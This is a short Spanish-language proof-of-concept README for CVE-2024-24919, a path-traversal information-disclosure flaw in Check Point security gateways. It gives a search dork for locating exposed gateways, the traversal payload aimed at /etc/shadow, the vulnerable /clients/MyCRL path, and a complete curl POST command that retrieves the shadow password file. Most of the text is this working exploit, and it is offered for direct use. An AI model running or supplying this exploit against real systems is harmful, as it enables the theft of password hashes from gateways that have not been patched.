
Es una prueba de concepto de CVE-2024-24919-POC, la hice después de que se descubriera.
Es una Prueba de Concepto sobre CVE-2024-24919-POC, la creé después de su descubrimiento.
CVE-2024-24919 vulnerabilidad de divulgación de información en la puerta de enlace de seguridad de Checkpoint. Puedes verlo en Notion-CVE-2024-24919_POC
title:"Check Point" "Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7"
aCSHELL/../../../../../../../etc/shadow
- en la ruta 💡 https://Host/clients/MyCRL > Reemplaza Host por la IP original
con curl para obtener el shadow de contraseñas
curl --path-as-is -i -s -k -X $'POST' -H $'Host: 127.0.0.1' -H $'Content-Length: 39' -H $'Connection: keep-alive' --data-binary $'aCSHELL/../../../../../../../etc/shadow' $ 'https://127.0.0.1/clients/MyCRL'
ver más write-ups Enlace de Notion a write-ups
contacta conmigo haz clic aquí